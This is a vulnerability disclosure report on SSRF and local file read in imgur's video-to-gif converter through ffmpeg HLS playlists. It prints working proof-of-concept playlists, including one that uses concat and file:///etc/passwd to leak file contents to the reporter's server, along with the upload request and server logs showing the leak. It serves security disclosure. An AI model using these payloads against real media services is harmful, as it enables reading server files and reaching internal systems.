SSRF and local file read in video to gif converter

Video to gif converter on http://imgur.com/vidgif uses Lavf/55.48.100 with network options enabled. It makes possible SSRF by uploading specially crafted playlist. For example we can use mp4 file http://yngwie.ru/1.mp4 ``` #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, http://yngwie.ru/2.mp4 #EXT-X-ENDLIST ``` upload it by request ``` POST /vidgif/upload HTTP/1.1 Host: imgur.com ... source=http://yngwie.ru/1.mp4&url=http://yngwie.ru/1.mp4&start=0.08&stop=5.12 ``` and see second request from Lavf: ``` 54.167.254.53 - - [11/Feb/2016:05:08:20 -0500] "GET /1.mp4 HTTP/1.1" 200 84 "http://yngwie.ru" "-" "-" 54.82.61.224 - - [11/Feb/2016:05:08:20 -0500] "GET /2.mp4 HTTP/1.1" 404 169 "-" "Lavf/55.48.100" "-" ``` But this vulnerability not about only HTTP requests, it allows to read arbitrary files from server. Here is quick POC reading first line of /etc/passwd http://yngwie.ru/test.avi: ``` #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://yngwie.ru/header.m3u8|file:///etc/passwd #EXT-X-ENDLIST ``` header.m3u8 (very important - without space before eof): ``` #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:, http://yngwie.ru? ``` concat proto https://www.ffmpeg.org/ffmpeg-protocols.html#concat will make valid playlist with first line of /etc/passwd in url: ``` 54.82.61.224 - - [11/Feb/2016:04:55:32 -0500] "GET ?root:x:0:0:root:/root:/bin/bash HTTP/1.1" 400 173 "-" "-" "-" ``` it is possible to read full files by subfile proto https://www.ffmpeg.org/ffmpeg-protocols.html#subfile or by constructing 100% valid video files and extracting data from gifs. Sensitive files on server, some private apis, accessable from server, or some other allowed protocols which I didn't check may lead even to RCE. Links to original report about this issue: https://habrahabr.ru/company/mailru/blog/274855/ (russian) http://www.openwall.com/lists/oss-security/2016/01/14/1